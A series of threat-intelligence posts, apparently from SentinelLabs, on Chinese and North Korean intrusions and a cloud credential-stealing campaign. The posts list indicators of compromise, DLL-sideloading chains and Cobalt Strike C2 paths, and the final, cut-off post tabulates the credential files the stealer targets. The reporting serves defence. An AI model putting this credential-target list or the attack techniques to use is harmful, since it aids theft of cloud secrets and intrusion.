Executive Summary

  • SentinelLabs has identified suspected-Chinese malware and infrastructure potentially involved in China-associated operations directed at the gambling sector within Southeast Asia.
  • The threat actors drop Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons.
  • We’ve observed related malware using the signature of a likely stolen code signing certificate issued to PMG PTE LTD, a Singapore-based vendor of Ivacy VPN services.
  • Indicators point to the China-aligned BRONZE STARLIGHT group; however, the exact grouping remains unclear due to the interconnected relationships among various Chinese APT groups.

Overview

Thriving after China’s crackdown on its Macao-based gambling industry, the Southeast Asian gambling sector has become a focal point for the country’s interests in the region, particularly data collection for monitoring and countering related activities in China.

We observed malware and infrastructure likely related to China-aligned activities targeting this sector. The malware and infrastructure we analyze are related to indicators observed in Operation ChattyGoblin and are likely part of the same activity cluster. Operation ChattyGoblin is ESET’s name for a series of attacks by China-nexus actors targeting Southeast Asian gambling companies with trojanized Comm100 and LiveHelp100 chat applications.

The targeting, used malware, and C2 infrastructure specifics point to past activities that third parties have linked to the China-aligned BRONZE STARLIGHT group (also known as DEV-0401 or SLIME34). This is a suspected Chinese ‘ransomware’ group whose main goal appears to be espionage rather than financial gain, using ransomware as means for distraction or misattribution. Team T5 has also reported on BRONZE STARLIGHT’s politically-motivated involvement in targeting the Southeast Asian gambling industry.

Despite the indicators observed, accurate clustering remains challenging. The Chinese APT ecosystem is plagued by extensive sharing of malware and infrastructure management processes between groups, making high confidence clustering difficult based on current visibility. Our analysis has led us to historical artifacts that represent points of convergence between BRONZE STARLIGHT and other China-based actors, which showcases the complexity of a Chinese threat ecosystem composed of closely affiliated groups.

Background

ESET reported that a ChattyGoblin-related attack in March 2023 targeted the support agents of a gambling company in the Philippines. In the attack, a trojanized LiveHelp100 application downloaded a .NET malware loader named agentupdate_plugins.exe. The final payload was a Cobalt Strike beacon using the duckducklive[.]top domain for C2 purposes. The hash of this malware loader was not disclosed.

We subsequently identified malware loaders that we assess are closely related to those observed as part of Operation ChattyGoblin and are likely part of the same activity cluster – a .NET executable also named agentupdate_plugins.exe and its variant AdventureQuest.exe.

This association is based on naming conventions, code, and functional overlaps with the sample described in ESET’s report. Although we cannot conclusively determine whether the agentupdate_plugins.exe we analyzed is the same as that reported by ESET, we note that one of its VirusTotal submissions is dated March 2023 and originates from the Philippines. This aligns with the geolocation of the target and the timeline of the ChattyGoblin-related attack involving agentupdate_plugins.exe.

The Malware Loaders

agentupdate_plugins.exe and  AdventureQuest.exe  deploy .NET executables based on the SharpUnhooker tool, which download second-stage data from Alibaba buckets hosted at agenfile.oss-ap-southeast-1.aliyuncs[.]com and codewavehub.oss-ap-southeast-1.aliyuncs[.]com. The second-stage data is stored in password-protected zip archives.

The zip archives downloaded by agentupdate_plugins.exe and AdventureQuest.exe contain sideloading capabilities. Each of the archives we were able to retrieve consists of a legitimate executable vulnerable to DLL search order hijacking, a malicious DLL that gets sideloaded by the executable when started, and an encrypted data file named agent.data.

The executables are components of the software products Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan. The malicious DLLs masquerade as their legitimate counterparts:  They export functions with the same names, such that specific functions, when invoked by the legitimate executables, decrypt and execute code embedded in the data files. The data files we could retrieve implement Cobalt Strike beacons.

Zip archive  Archive content Final payload
adobe_helper.zip (agentupdate_plugins.exe) Adobe CEF Helper.exe libcef.dll agent.data (not available) /
cefhelper.zip (AdventureQuest.exe) identity_helper.exe msedge_elf.dll agent.data Cobalt Strike C2: www.100helpchat[.]com
Agent_bak.zip (AdventureQuest.exe) mfeann.exe LockDown.dll agent.data Cobalt Strike C2: live100heip[.]com

The 100helpchat[.]com and live100heip[.]com C2 domains follow the naming convention of the LiveHelp100 trojanized application used in operation ChattyGoblin, possibly to make malicious network activity look like legitimate LiveHelp100 activity.

agentupdate_plugins.exe and AdventureQuest.exe implement geofencing based on the ifconfig.co IP-based geolocation service. The loaders are meant to stop their execution if they are run on a machine located in the United States, Germany, France, Russia, India, Canada, or the United Kingdom. This may indicate that the threat actors have no interest in intrusions in these countries for this campaign. Due to errors in implementation, the geofencing fails to work as intended.

Stolen Ivacy VPN Certificate

AdventureQuest.exe is signed using a certificate issued to the Ivacy VPN vendor PMG PTE LTD:

  • Thumbprint: 62E990CC0A26D58E1A150617357010EE53186707
  • Serial number: 0E3E037C57A5447295669A3DB1A28B8A.

Ivacy has been present on the market since 2007 and attracts users with low-price offerings.

It is likely that at some point the PMG PTE LTD singing key has been stolen – a familiar technique of known Chinese threat actors to enable malware signing. VPN providers are critical targets, since they enable threat actors to potentially gain access to sensitive user data and communications.

At the time of writing, we have not observed any public statements by PMG PTE LTD clarifying the circumstances that have led to the use of their signing keys for signing malware. The DigiCert Certificate Authority has revoked the compromised certificate after a public discussion on the issue.

HUI Loader

The malicious DLLs libcef.dll, msedge_elf.dll, and LockDown.dll distributed by agentupdate_plugins.exe and AdventureQuest.exe are HUI Loader variants. HUI Loader is a custom malware loader shared between several China-nexus groups. The loader is executed through sideloading by legitimate executables vulnerable to DLL hijacking and stages a payload stored in an encrypted file. HUI Loader variants may differ in implemented payload staging and execution techniques as well as additional functionalities, such as establishing persistence and disabling security features.

libcef.dll, msedge_elf.dll, and LockDown.dll closely resemble HUI Loader variants observed in a string of cyberespionage and ransomware operations that third parties have linked to APT10, TA410, and BRONZE STARLIGHT.

Threat actor Description
BRONZE STARLIGHT
Aliases: DEV-0401, SLIME34
A China-based ransomware operator active since 2021. The group is known for deploying a variety of ransomware families, such as LockFile, AtomSilo, NightSky, LockBit 2.0, and Pandora, and shares tooling with APT10. BRONZE STARLIGHT’s main goal is suspected to be espionage rather than financial gain, using ransomware as means for distraction or misattribution.
APT10
Aliases: BRONZE RIVERSIDE, MenuPass
A China-nexus cyberespionage group active since at least 2009. The group focuses on targeting entities considered strategically important by the Chinese state.
TA410 A China-nexus cyberespionage group loosely linked to APT10, tracked as a distinct entity. The group is mostly known for targeting the US utilities sector and Middle Eastern governments.

APT10 and TA410 Operations

The cef_string_map_key function of libcef.dll downloaded by agentupdate_plugins.exe references the C:\Users\hellokety.ini file.

The cef_string_map_key function
The cef_string_map_key function

HUI Loader variants with this exact artifact have been reported as part of several cyberespionage operations:

  • enSilo (now Fortinet) has disclosed cyberespionage activities in Southeast Asia observed in April 2019 and attributed them with medium confidence to APT10.
  • Researchers from Macnica, Secureworks, and Kaspersky have presented on A41APT campaign activity conducted throughout 2021. A41APT is a long-running cyberespionage campaign targeting Japanese companies and their overseas branches. Kaspersky has attributed earlier A41APT activity (from March 2019 to the end of December 2020) with high confidence to APT10. TrendMicro has attributed A41APT activity over 2020 and 2021 to a group they track as Earth Tengshe, noting that Earth Tengshe is related to APT10 with some differences in employed TTPs.
  • ESET has presented on TA410 activities, noting the hellokety.ini artifact in this context. ESET also notes the possibility of misattribution the April 2019 activities reported by Fortinet to APT10 instead of TA410.
HUI Loader variants (hellokety.ini) used in APT10 and TA410 operations
HUI Loader variants (hellokety.ini) used in APT10 and TA410 operations

BRONZE STARLIGHT Operations

Since around 2021, HUI Loader variants have been deployed in operations involving the ransomware families LockFile (Symantec, 2021; NSFOCUS, 2021), AtomSilo (Sophos, 2021), NightSky (Microsoft, 2021), LockBit 2.0 (SentinelLabs, 2022), and Pandora (TrendMicro, 2022). Some of these operations have been attributed to BRONZE STARLIGHT by the organizations disclosing them and all of them collectively by Secureworks. All of these ransomware families have been noted by Microsoft as being part of the BRONZE STARLIGHT arsenal in time intervals aligning with those of the previously mentioned operations.

C2 Infrastructure

The Cobalt Strike C2 GET and POST URIs associated with the Operation ChattyGoblin domain duckducklive[.]top contain /functionalStatus and /rest/2/meetings, respectively. Their uncommon full forms closely resemble those observed by Secureworks in AtomSilo, Night Sky, and Pandora operations they attribute to BRONZE STARLIGHT. The researchers reported that, as of June 2022, they had not seen this Cobalt Strike configuration associated with other ransomware families. The threat actors have likely adapted a public Cobalt Strike malleable C2 profile available in a Github repository of the user xx0hcd.

Cobalt Strike C2 POST URI Relation
/rest/2/meetingsmCRW64qPFqLKw7X56lR41fx Operation ChattyGoblin
/rest/2/meetingsVDcrCtBuGm8dime2C5zQ3EHbRE156AkpMu6W AtomSilo
/rest/2/meetingsQpmhJveuV1ljApIzpTAL Night Sky
/rest/2/meetingsKdEs85OkdgIPwcqbjS7uzVZKBIZNHeO4r5sKe Pandora

The C2 GET and POST URIs associated with the www.100helpchat[.]com and live100heip[.]com domains we observed contain /owa followed by character strings. The format of these strings resembles those in the URIs associated with duckducklive[.]top and also those reported in past BRONZE STARLIGHT activities. It is likely that the threat actors have adapted another open source Cobalt Strike malleable C2 profile, which is also available in a Github repository of the user xx0hcd.

Domain Cobalt Strike C2 URIs
live100heip[.]com GET: /owa/Z7bziD-BDtV9U1aLS9AhW4jyN1NEOelTEi
POST: /owa/LAC9kgQyM1HD3NSIwi–mx9sHB3vcmjJJm
www.100helpchat[.]com GET: /owa/aLgnP5aHtit33SA2p2MenNuBmYy
POST: /owa/XF0O-PjSCEslnDo51T0K4TOY

The Cobalt Strike profiles associated with the duckducklive[.]top, www.100helpchat[.]com, and live100heip[.]com domains share a C2 port number (8443) and a watermark (391144938). The earliest record of duckducklive[.]top becoming active is dated 24 Feb 2023. The earliest records of live100heip[.]com and 100helpchat[.]com becoming active are dated 24 Feb 2023 (overlapping with that of duckducklive[.]top) and 28 Feb 2023, respectively.

The three domains are each hidden behind CloudFlare, who were quick in remediation after we reported the service abuse. In this case, however, the actors revealed their true-hosting locations due to an OPSEC mistake in their initial deployment of the domain’s SSL certificates on their Alibaba Cloud hosting servers at 8.218.31[.]103, 47.242.72[.]118, and 47.242.159[.]242.

Certificates use on Alibaba IPs
Certificates use on Alibaba IPs

While the analysis of the Cobalt Strike profiles provides links to previous BRONZE STARLIGHT activities, an assessment of the specific group attribution based on current intelligence should be treated with caution. It is noteworthy that Chinese cyber espionage threat actors are progressively refining their operational tactics in manners that obfuscate clear attribution through publicly available intelligence sources alone.

To illustrate this concept, consider the scenario where a broader array of domains imitating various brands may be interconnected, such as those publicly documented involving the BRONZE STARLIGHT, TA410, and APT10 threat actors. Examples include microsofts[.]net, microupdate[.]xyz, microsofts[.]info, microsofts[.]org, miscrosofts[.]com, microsofts[.]com, kaspresksy[.]com, tencentchat[.]net, and microsoftlab[.]top.

Conclusion

China-nexus threat actors have consistently shared malware, infrastructure, and operational tactics in the past, and continue to do so. The activities this post discusses illustrate the intricate nature of the Chinese threat landscape.

Better understanding of this landscape is essential for keeping up with its dynamics and improving defense strategies. Achieving this necessitates consistent collaborative and information sharing efforts. SentinelLabs remains dedicated to this mission and continues to closely monitor related threats.

Indicators of Compromise

Files (SHA1)

Indicator Description
09f82b963129bbcc6d784308f0d39d8c6b09b293 agentupdate_plugins.exe
1a11aa4bd3f2317993cfe6d652fbe5ab652db151 LockDown.dll
32b545353f4e968dc140c14bc436ce2a91aacd82 mfeann.exe
4b79016d11910e2a59b18275c786682e423be4b4 Adobe CEF Helper.exe
559b4409ff3611adaae1bf03cbadaa747432521b identity_helper.exe
57bbc5fcfd97d25edb9cce7e3dc9180ee0df7111 agentdata.dat
6e9592920cdce90a7c03155ef8b113911c20bb3a AdventureQuest.exe
76bf5ab6676a1e01727a069cc00f228f0558f842 agentdata.dat
88c353e12bd23437681c79f31310177fd476a846 libcef.dll
957e313abaf540398af47af367a267202a900007 msedge_elf.dll

Second-Stage Data URLs

https[://]agenfile.oss-ap-southeast-1[.]aliyuncs.com/agent_source/temp1/cefhelper.zip AdventureQuest.exe
https[://]agenfile.oss-ap-southeast-1.aliyuncs.com/agent_source/temp2/agent_bak.zip AdventureQuest.exe
https[://]agenfile.oss-ap-southeast-1.aliyuncs.com/agent_source/temp3/adobe_helper.zip agentupdate_plugins.exe
https[://]codewavehub.oss-ap-southeast-1.aliyuncs[.]com/org/com/file/CodeVerse.zip AdventureQuest.exe

C2 Domains

www.100helpchat[.]com Cobalt Strike
live100heip[.]com Cobalt Strike

C2 IP Addresses

8.218.31[.]103 Cobalt Strike
47.242.72[.]118 Cobalt Strike

Comrades in Arms? | North Korea Compromises Sanctioned Russian Missile Engineering Company

By: Tom Hegel
7 August 2023 at 09:58

By Tom Hegel and Aleksandar Milenkoski 

Executive Summary

  • SentinelLabs identified an intrusion into the Russian defense industrial base, specifically a missile engineering organization NPO Mashinostroyeniya.
  • Our findings identify two instances of North Korea related compromise of sensitive internal IT infrastructure within this same Russian DIB organization, including a specific email server, alongside use of a Windows backdoor dubbed OpenCarrot.
  • Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.
  • At this time, we cannot determine the potential nature of the relationship between the two threat actors. We acknowledge a potential sharing relationship between the two DPRK-affiliated threat actors as well as the possibility that tasking deemed this target important enough to assign to multiple independent threat actors.

Background

North Korean threat actors have caught our attention over the past year, providing us with fruitful insight into a variety of campaigns, such as new reconnaissance tools, (multiple) new supply chain intrusions, elusive multi-platform targeting, and new sly social engineering tactics. To add to that list, let’s take a look at an intrusion into what might be considered a highly desirable strategic espionage mission – supporting North Korea’s contentious missile program.

The Target Organization

While conducting our usual hunting and tracking of suspected-North Korean threat actors, we identified a leaked email collection containing an implant with characteristics related to previously reported DPRK-affiliated threat actor campaigns. A thorough investigation of the email archive revealed a larger intrusion, not fully recognized at the time by the compromised organization.

The victim organization is NPO Mashinostroyeniya (JSC MIC Mashinostroyenia, NPO Mash), a leading Russian manufacturer of missiles and military spacecraft. The organization’s parent company is JSC Tactical Missiles Corporation KTRV (Russian: АО «Корпорация Тактическое Ракетное Вооружение», КТРВ). NPO Mashinostroyeniya is a sanctioned entity that possesses highly confidential intellectual property on sensitive missile technology currently in use and under development for the Russian military.

We are highly confident that the emails related to this activity originate from the victim organization. Furthermore, there are no discernible signs of manipulation or technically verifiable inaccuracies present in these emails. It’s essential to highlight that the leaked data comprises a substantial volume of emails unrelated to our current research scope. This suggests that the leak was likely accidental or resulted from activity unrelated to the specific intrusion under scrutiny in our investigation. However, this collection provides valuable background context for our understanding of their internal network design, security gaps, and even cases of activity by other attackers.

Example of unrelated email alerts from Russian CERT to NPO Mash
Example of unrelated email alerts from Russian CERT to NPO Mash

In mid-May 2022, roughly a week prior to Russia vetoing a U.N. resolution to impose new sanctions on North Korea for intercontinental ballistic missile launches that could deliver nuclear weapons, the victim organization internally flagged the intrusion. Internal NPO Mashinostroyeniya emails show IT staff exchanged discussions highlighting questionable communications between specific processes and unknown external infrastructure. The same day, the NPO Mashinostroyeniya staff also identified a suspicious DLL file present in different internal systems. The month following the intrusion, NPO Mashinostroyeniya engaged with their AV solution’s support staff to determine why this and other activity was not detected.

Following an examination of the emails and an in-depth investigation into the two separate sets of suspicious activity, we have successfully established a correlation between each cluster of activity and a respective threat actor amounting to a more significant network intrusion than the victim organization realized.

North Korean Overlap

During our investigation, we identified the suspicious file in question to be a version of the OpenCarrot Windows OS backdoor, previously identified by IBM XForce as part of Lazarus group activities. As a feature-rich, configurable, and versatile backdoor, the malware is a strong enabler of the group’s operations. With a wide range of supported functionality, OpenCarrot enables full compromise of infected machines, as well as the coordination of multiple infections across a local network. The OpenCarrot variant we analyzed supports proxying C2 communication through the internal network hosts and directly to the external server, which supports the strong possibility of a network-wide compromise.

Additionally, we discovered the suspicious network traffic discussed in emails is the compromise of the business’ Linux email server, hosted publicly at vpk.npomash[.]ru (185.24.244[.]11). At time of discovery, the email server was beaconing outbound to infrastructure we now attribute to the ScarCruft threat actor. ScarCruft is commonly attributed to North Korea’s state-sponsored activity, targeting high value individuals and organizations near-globally. The group is also referred to as Inky Squid, APT37, or Group123, and often showcases a variety of technical capabilities for their intrusions. While we are unable to confirm the initial access method and implant running on the email server at time of discovery, we link malware loading tools and techniques involving this set of infrastructure to those seen in previously reported ScarCruft activity using the RokRAT backdoor.

This intrusion gives rare insight into sensitive DPRK cyberespionage campaigns, and an opportunity to expand our understanding of the relationship and goals between various North Korean cyber threat actors. It also highlights a potential rift in relations between Russia and North Korea, considering their growing relationship.

This engagement establishes connections between two distinct DPRK-affiliated threat actors, suggesting the potential for shared resources, infrastructure, implants, or access to victim networks. Moreover, we acknowledge the possibility that the assigned task of an intrusion into NPO Mashinostroyeniya might have warranted targeting by multiple autonomous threat actors due to its perceived significance.

OpenCarrot Backdoor Activity

The OpenCarrot sample we analyzed is implemented as a Windows service DLL file, intended to execute in a persistent manner. In line with typical practices of the Lazarus group, OpenCarrot is subject to continuous, not necessarily incremental, changes. The file has a compilation timestamp of Wednesday, Dec. 01, 2021. Although the timestamp could have been manipulated by the threat actors, given the proximity to the May 2022 suspected intrusion date, it’s likely that the timestamp is authentic. Our confidence in this assessment also increases through the infrastructure analysis below.

The OpenCarrot variant we analyzed implements over 25 backdoor commands with a wide range of functionality representative of Lazarus group backdoors.  In this case, supported functionality includes:

  • Reconnaissance: File and process attribute enumeration, scanning and ICMP-pinging hosts in IP ranges for open TCP ports and availability.
  • Filesystem and process manipulation: Process termination, DLL injection, and file deletion, renaming, and timestomping.
  • Reconfiguration and connectivity: Managing C2 communications, including terminating existing and establishing new comms channels, changing malware configuration data stored on the filesystem, and proxying network connections.

The OpenCarrot sample displays further characteristics often seen among Lazarus Group malware.

Its backdoor commands are indexed by consecutive integers, a common trait of Lazarus group malware. In addition to integer-indexed commands, the developers implement string-indexed sub-commands.

Backdoor command indexing
Backdoor command indexing

Keeping with their typical mode of operations, the malware is intended to execute as a Windows service and exports the ServiceMain function.

OpenCarrot implements executable code in a section named .vlizer indicating the use of code virtualization for obfuscation. The .vlizer section is associated with the Oreans Code Virtualizer code protection platform, a functional subset of Themida. As previously observed in Themida-protected Lazarus group malware, some code segments of the OpenCarrot variant we analyzed are not protected.

As part of its initialization process, OpenCarrot ingests configuration data from a file whose name is composed of the service name in whose context the malware executes and the dll.mui extension. The configuration data contains encryption-protected C2 information. The use of configuration files with the dll.mui extension is a long-standing theme among Lazarus group malware, mimicking a lesser-known standard Windows file extension used to denote application resources and externalities.

OpenCarrot implements relatively long sleep time periods. To avoid remaining idle for too long whenever the user of the infected machine is active, OpenCarrot implements a mechanism to exit its sleep state earlier than instructed. If the malware is instructed to sleep for 15 seconds or more, it then monitors in 15 second intervals for the insertion of new drives, such as USBs. If such an event occurs, the malware exits its sleep state before the configured sleep time elapses. A variant of this technique has been previously observed in the Pebbledash malware.

Disk drive monitoring
Disk drive monitoring

OpenCarrot’s versatility is evident with its support of multiple methods for communicating with C2 servers. The malware dispatches commands for execution based on attacker-provided data originating not only from remote C2 servers, but also from local processes through named pipes and incoming connections to a TCP port on which OpenCarrot listens.

Infrastructure Analysis

North Korean-nexus of threat actors are known for not maintaining the OPSEC of their campaigns. A characteristic lack of segmentation allows researchers to amass unique insights across a variety of unreported activity. Infrastructure connections in particular often allow us to track the evolution of their campaigns over long periods of time.

We link the NPO Mashinostroyeniya email discussing suspicious networking communication as active C2 communications occurring through 192.169.7[.]197, and 5.134.119[.]142. The internal host, the organization’s Red Hat email server, was actively compromised and in communication with the attackers malicious infrastructure. A review of all details concludes the threat actor was likely operating on this server for an extensive period of time prior to the internal team’s discovery.

Email between NPO Mash Employees sharing beaconing process details
Email between NPO Mash Employees sharing beaconing process details

This set of malicious infrastructure was served via CrownCloud (Australia) and OhzCloud (Spain) VPS hosting providers. During the intrusion, the two domains centos-packages[.]com and redhat-packages[.]com were resolving to those C2 IP addresses. Our assessment is that this particular cluster of infrastructure became active in November 2021, and was immediately paused the same day of NPO Mashinostroyeniya’s intrusion discovery in May 2022. This finding may indicate the intrusion was high priority and closely monitored by the operators.

Infrastructure and Timeline
Infrastructure and Timeline

A relationship can be observed between this cluster of activity and a more recent ScarCruft campaign. Following the intrusion operators immediately killing their C2 server when the suspicious traffic was identified by the victim in May 2022, the centos-packages[.]com domain use was paused until it began resolving to 160.202.79[.]226 in February 2023. 160.202.79[.]226 is a QuickPacket VPS (US) hosting IP also being shared with the domain dallynk[.]com and others used by ScarCruft for malware delivery and C2 initiated through malicious documents.

Further, the domain dallynk[.]com follows the theme we’ve previously reported in which DPRK-associated threat actors impersonate Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea.

The collection of activity stemming from the dallynk[.]com domain contains malware loading tools and techniques matching those seen in previously reported ScarCruft activity using the RokRAT backdoor. Similarities in server configuration history can also link to lower-confidence BlueNoroff relationships.

Infrastructure ScarCruft Link
Infrastructure ScarCruft Link

While conducting this research, we first publicly identified the link between the JumpCloud intrusion and North Korean threat actors. One detail that immediately struck us was the domain theme similarities, such as centos-pkg[.]org / centos-repos[.]org (JumpCloud), and centos-packages[.]com (NPO Mash). This detail is superficial and not strong enough alone to base direct clustering, but alongside other aforementioned North Korean threat actor connections, it stokes our curiosity for the particulars of the threat actors’ infrastructure creation and management procedures.

Lastly, we advise particular care into how this infrastructure is further attributed when reviewed historically. For example, the C2 server IP address 192.169.7[.]197 was used between January and May 2022 by the DPRK linked threat actor; however, that same IP was used by the Arid Viper/Desert Falcon APT in 2020, first reported by Meta Threat Investigators. Arid Viper is associated with Palestinian interests, conducting activity throughout the Middle East. We assess the Arid Viper activity is unrelated to our findings and the overlap of infrastructure is simply an example of commonly reused dubious VPS hosting providers. This further highlights the importance of associating active timeframes with IP-based indicators.

Conclusion

With a high level of confidence, we attribute this intrusion to threat actors independently associated with North Korea. Based on our assessment, this incident stands as a compelling illustration of North Korea’s proactive measures to covertly advance their missile development objectives, as evidenced by their direct compromise of a Russian Defense-Industrial Base (DIB) organization.

The convergence of North Korean cyber threat actors represents a profoundly consequential menace warranting comprehensive global monitoring. Operating in unison as a cohesive cluster, these actors consistently undertake a diverse range of campaigns motivated by various factors. In light of these findings, it becomes crucial to address and mitigate this threat with utmost vigilance and strategic response.

Indicators

MD5:
9216198a2ebc14dd68386738c1c59792
6ad6232bcf4cef9bf40cbcae8ed2f985
d0f6cf0d54cf77e957bce6dfbbd34d8e
921aa3783644750890b9d30843253ec6
99fd2e013b3fba1d03a574a24a735a82
0b7dad90ecc731523e2eb7d682063a49
516beb7da7f2a8b85cb170570545da4b

SHA1:
07b494575d548a83f0812ceba6b8d567c7ec86ed
2217c29e5d5ccfcf58d2b6d9f5e250b687948440
246018220a4f4f3d20262b7333caf323e1c77d2e
8b6ffa56ca5bea5b406d6d8d6ef532b4d36d090f
90f52b6d077d508a23214047e680dded320ccf4e
f483c33acf0f2957da14ed422377387d6cb93c4d
f974d22f74b0a105668c72dc100d1d9fcc8c72de

redhat-packages[.]com
centos-packages[.]com
dallynk[.]com
yolenny[.]com
606qipai[.]com
asplinc[.]com
bsef.or[.]kr

192.169.7[.]197
160.202.79[.]226
96.9.255[.]150
5.134.119[.]142

JumpCloud Intrusion | Attacker Infrastructure Links Compromise to North Korean APT Activity

By: Tom Hegel
20 July 2023 at 10:00

In recent news, the cloud-based IT management service JumpCloud publicly shared details gathered from the investigation into an intrusion on their network. Alongside the updated details, the organization shared a list of associated indicators of compromise (IOCs), noting attribution to an unnamed “sophisticated nation-state sponsored threat actor”.

Reviewing the newly released indicators of compromise, we associate the cluster of threat activity to a North Korean state sponsored APT. The IOCs are linked to a wide variety of activity we attribute to DPRK, overall centric to the supply chain targeting approach seen in previous campaigns.

Infrastructure Analysis

Based on the IOCs shared by JumpCloud, we were able to analyze the threat actor’s infrastructure. The following list is our starting point:

Domains

alwaysckain.com canolagroove.com centos-pkg.org
centos-repos.org datadog-cloud.com datadog-graph.com
launchruse.com nomadpkg.com nomadpkgs.com
primerosauxiliosperu.com reggedrobin.com toyourownbeat.com
zscaler-api.org

IP Addresses

51.254.24.19 185.152.67.39 70.39.103.3
66.187.75.186 104.223.86.8 100.21.104.112
23.95.182.5 78.141.223.50 116.202.251.38
89.44.9.202 192.185.5.189 162.241.248.14
179.43.151.196 45.82.250.186 162.19.3.23
144.217.92.197 23.29.115.171 167.114.188.40
91.234.199.179

By mapping out this infrastructure, it is possible to show the links between the diverse set of IP addresses and pick up various patterns.

Triggering alerts on 192.185.5[.]189 alone is ill advised, as it’s a shared hosting server for many domains and not an indicator of malicious activity by itself. However, toyourownbeat[.]com shares an SSL certificate with skylerhaupt[.]com, indicating a potential relationship in owner.

The indicator 144.217.92[.]197 shared by JumpCloud does not host any domains from the list they shared, but we can see one similar through the use of passive DNS data: npmaudit[.]com, which was also just recently shared by GitHub in an alert of their own.

Based on public details available as of this writing, it’s unclear if the GitHub alert originated from the JumpCloud incident or if they are separate efforts by the same attacker.

Infrastructure Map Noting JumpCloud links
Infrastructure Map Noting JumpCloud links

Moving on to IP address 23.29.115[.]171, we can see through PDNS data that the domain npm-pool[.]org is related. Notably, this domain is quite similar to the NPM theme of domains shared in the GitHub alert.

Infrastructure Map Noting JumpCloud and GitHub Overlap
Infrastructure Map Noting JumpCloud and GitHub Overlap

While the following is not a strong indicator of attribution alone, it’s noteworthy that specific patterns in how the domains are constructed and used follow a similar pattern to other DPRK linked campaigns we track. Indicators with suspected actor association, but unverified as of this writing, include junknomad[.]com and insatageram[.]com (registered with jeanettar671belden[@]protonmail[.]com).

Additional pivots of potential interest can be made through other IPs, including 167.114.188[.]40, and to a variety of low confidence attacker-associated infrastructure.

Following the profile of the associated infrastructure from both the JumpCloud intrusion and the GitHub security alert, we can expand to further associated threat activity. For example, we can see clear links to other NPM and “package” themed infrastructure we associate with high to medium confidence, as noted in the list below. This list further expands thanks to the findings and blog from Phylum in late June.

npmjscloud[.]com
npmcloudjs[.]com
nodepkg[.]com
dadiwarm[.]com
216.189.145[.]247
npmjsregister[.]com
142.44.178[.]222
tradingprice[.]net
bi2price[.]com

Trivial pivots from here can be made to similar behaving infrastructure linked to TraderTraitor, as noted by GitHub, plus those of AppleJeus such as Celas Trade Pro via celasllc[.]com.

Conclusion

It is evident that North Korean threat actors are continuously adapting and exploring novel methods to infiltrate targeted networks. The JumpCloud intrusion serves as a clear illustration of their inclination towards supply chain targeting, which yields a multitude of potential subsequent intrusions. The DPRK demonstrates a profound understanding of the benefits derived from meticulously selecting high-value targets as a pivot point to conduct supply chain attacks into fruitful networks.

Cloudy With a Chance of Credentials | AWS-Targeting Cred Stealer Expands to Azure, GCP

13 July 2023 at 12:55

By Alex Delamotte, with Ian Ahl (Permiso) and Daniel Bohannon (Permiso)

Executive Summary

  • Throughout June 2023, an actor behind a cloud credentials stealing campaign has expanded their tooling to target Azure and Google Cloud Platform (GCP) services. Previously, this actor focused exclusively on Amazon Web Services (AWS) credentials.
  • Cloud service credentials are increasingly targeted as actors find more ways to profit from compromising such services. This actor targeted exposed Docker instances to deploy a worm-like propagation module.
  • These campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew. However, attribution remains challenging with script-based tools, as anyone can adapt the code for their own use.

Background

In December 2022, the threat research team at Permiso Security reported about a cloud credential stealer campaign that primarily targeted Amazon Web Services (AWS) credentials from public-facing Jupyter Notebooks services. The actors likely accessed these impacted services through unpatched web application vulnerabilities.

From June 14, 2023 through the end of the month, we worked with the Permiso team to track and analyze files related to a new incarnation of this campaign targeting exposed Docker services. The hallmark shell scripts remain the core of these campaigns, though we also identified an Executable and Linkable Format (ELF) binary written in Golang. The research team at Aqua also recently reported elements they observed from these actors’ abuse of Docker images.

SentinelLabs thanks the Permiso Security research team for their collaboration on the research in this report. The Permiso team released a blog about this campaign, which can be found here.

Tooling Updates

Since the December campaign, the actor has made several updates to how their tooling works.

Script Functionality

The December campaign targeted AWS credentials; the most recent campaigns added functions that target credentials from Azure and GCP. The actor actively modified these features as the campaigns evolved throughout June: Initially, a script aws.sh contained references to Azure credentials, but the relevant function was not called. A week later, samples emerged where the Azure credential functions were called.

The actor stored the generic credentials in an array labeled CRED_FILE_NAMES. The AWS-specific array from the original script ACF has been replaced with AWS_CREDS_FILES. We dive into this in more detail in the next section. There are also two new cloud service provider (CSP)-specific credentials variables: GCLOUD_CREDS_FILES and AZURE_CREDS_FILES.

The actor made the script more modular as it grew larger and more complex. The AWS functionality is now split into three smaller functions that are driven by the run_aws_grabber function only if the system is identified as AWS. This increases the efficiency of the script by running AWS commands only on AWS systems, which also enhances the script’s stealth.

Infrastructure

The actor no longer hosts files in an open directory, which complicates efforts to track and analyze these campaigns. Instead, C2 activity relies on a hardcoded username and password combination that are passed as arguments to the curl command.

The older campaign infrastructure was hosted on a Netherlands-based IP associated with Nice IT Services. The attacker has since moved infrastructure to AnonDns, a dynamic domain name service (DDNS) provider. The campaigns through June 2023 use one of several AnonDNS subdomains:

everlost.anondns.net
silentbob.anondns.net
ap-northeast-1.compute.internal.anondns.net

Credentials Collection

The newer versions target credentials in newly added arrays GCLOUD_CREDS_FILES and AZURE_CREDS_FILES. The versions emerging the week of 6/26/2023 added .env and docker-compose.yaml; the version from 6/15/2023 has env without the period, so the actor is apparently updating the tool to be more effective in the newest campaign. The newest campaign also has a new variable, MIXED_CREDFILES which contains only redis.conf.

The newer versions omitted the following credentials files that were present in the December campaign’s ACF:

cloud
.npmrc
credentials.gpg

The credentials collection logic in the new campaign’s samples targets the following services & technologies:

Technology Targeted File
Amazon Web Services .boto, .passwd-s3fs, .s3b_config, .s3backer_passwd, .s3cfg, credentials, s3proxy.conf
Azure azure.json
Google Cloud Platform .feature_flags_config.yaml, .last_opt_in_prompt.yaml, .last_survey_prompt.yaml, .last_update_check.json, access_tokens.db, active_config, adc.json, config_default, config_sentinel, credentials.db, gce
Censys censys.cfg
Docker docker-compose.yaml
Filezilla filezilla.xml, recentservers.xml, queue.sqlite3
Git .git-credentials
Grafana grafana.ini
Kubernetes clusters.conf, kubeconfig, secrets
Linux OS .netrc, netrc
Ngrok ngrok.yml
PostgresQL .pgpass, postgresUser.txt, postgresPassword.txt
Redis redis.conf
S3QL authinfo2
Server Message Block (SMB) .smbclient.conf, .smbcredentials, .samba_credentials
